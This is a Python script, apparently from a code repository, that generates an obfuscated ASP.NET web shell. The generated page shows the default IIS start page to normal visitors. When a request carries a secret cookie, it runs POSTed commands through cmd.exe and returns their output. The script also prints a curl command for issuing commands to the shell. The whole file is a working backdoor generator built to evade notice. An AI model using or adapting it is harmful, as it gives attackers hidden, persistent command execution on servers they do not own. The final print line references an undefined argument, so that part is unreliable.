path: root/aspx-backdoor.py
blob: 1b53ade22b6a5831313f7374a5f4e63c6199d021 (plain)
#!/usr/bin/env python3

import os
import re
import random
import string
from textwrap import dedent
from argparse import ArgumentParser

def obfuscate(s):
    pattern = r'\{\*(.*?)\*\}'
    placeholder_values = {}

    def get_or_generate_random_string(match):
        placeholder = match.group(1)
        if placeholder not in placeholder_values:
            placeholder_values[placeholder] = ''.join(random.choice(string.ascii_lowercase) for _ in range(8))
        return placeholder_values[placeholder]

    result_string = re.sub(pattern, get_or_generate_random_string, s)

    return result_string

def generate_aspx_backdoor(args):
    code = '200'
    status = '200 OK'
    iisstart_template = '''<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>IIS Windows Server</title>
<style type="text/css">
<!--
body {
    color:#000000;
    background-color:#0072C6;
    margin:0;
}

#container {
    margin-left:auto;
    margin-right:auto;
    text-align:center;
}

a img {
    border:none;
}

-->
</style>
</head>
<body>
<div id="container">
<a href="http://go.microsoft.com/fwlink/?linkid=66138&amp;clcid=0x409"><img src="iisstart.png" alt="IIS" width="960" height="600" /></a>
</div>
</body>
</html>'''
    lines = iisstart_template.split('\n')
    processed_lines = ['"' + line.replace('"', '""') + '" & vbCrLf & _' for line in lines]
    response = '\n'.join(processed_lines)
    response = response.rstrip(' & vbCrLf & _')

    backdoor = f'''<%@ Page Language="VB" Debug="true" %>
<%@ Import Namespace="System.IO" %>
<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.Web" %>

<script runat="server">
    Sub Page_Load(ByVal {{*sender*}} As Object, ByVal {{*e*}} As EventArgs)
        Dim {{*cookieMarker*}} As HttpCookie = Request.Cookies("{args.cookie_name}")
        If {{*cookieMarker*}} IsNot Nothing AndAlso {{*cookieMarker*}}.Value = "{args.password}" Then
            Dim {{*command1*}} As String = {{*GetCommandFromPost*}}()

            If Not String.IsNullOrEmpty({{*command1*}}) Then
                {{*command1*}} = HttpUtility.UrlDecode({{*command1*}})
                {{*ExecuteCommand*}}({{*command1*}})
            End If
        Else
            Response.StatusCode = {code}
            Response.Status = "{status}"
            Response.Write({response})
        End If
    End Sub

    Function {{*GetCommandFromPost*}}() As String
        Dim {{*commandParam*}} As String = "cmd="
        Dim {{*command2*}} As String = Nothing

        If Request.HttpMethod = "POST" Then
            Using {{*reader*}} As New StreamReader(Request.InputStream)
                Dim {{*requestBody*}} As String = {{*reader*}}.ReadToEnd()

                Dim {{*cmdIndex*}} As Integer = {{*requestBody*}}.IndexOf({{*commandParam*}})
                If {{*cmdIndex*}} <> -1 Then
                    {{*command2*}} = {{*requestBody*}}.Substring({{*cmdIndex*}} + {{*commandParam*}}.Length)
                End If
            End Using
        End If

        Return {{*command2*}}
    End Function

    Sub {{*ExecuteCommand*}}(ByVal {{*command3*}} As String)
        Dim {{*myProcess*}} As New Process()
        Dim {{*myProcessStartInfo*}} As New ProcessStartInfo("cmd.exe")
        {{*myProcessStartInfo*}}.UseShellExecute = False
        {{*myProcessStartInfo*}}.RedirectStandardOutput = True
        {{*myProcessStartInfo*}}.Arguments = "/c " & {{*command3*}}
        {{*myProcess*}}.StartInfo = {{*myProcessStartInfo*}}
        {{*myProcess*}}.Start()

        Dim {{*myStreamReader*}} As StreamReader = {{*myProcess*}}.StandardOutput
        Dim {{*myString*}} As String = {{*myStreamReader*}}.ReadToEnd()
        {{*myProcess*}}.Close()
        Response.Write({{*myString*}})
    End Sub
</script>'''

    with open(f'backdoor_{args.cookie_name}:{args.password}.aspx', 'w') as fh:
        fh.write(obfuscate(backdoor))

    print(f'[INFO] created aspx backdoor as "backdoor_{args.cookie_name}:{args.password}.aspx"')
    print('[INFO] issue commands with:')
    print('curl http://example.com/backdoor.aspx -H "Cookie: {args.cookie}={args.password}" -d "cmd=whoami /priv" -X POST')


if __name__ == '__main__':
    # Command-line entry point: both options are mandatory and are handed
    # straight to the generator as the parsed namespace.
    cli = ArgumentParser()
    cli.add_argument('-c', '--cookie-name', required=True)
    cli.add_argument('-p', '--password', required=True)
    args = cli.parse_args()
    generate_aspx_backdoor(args)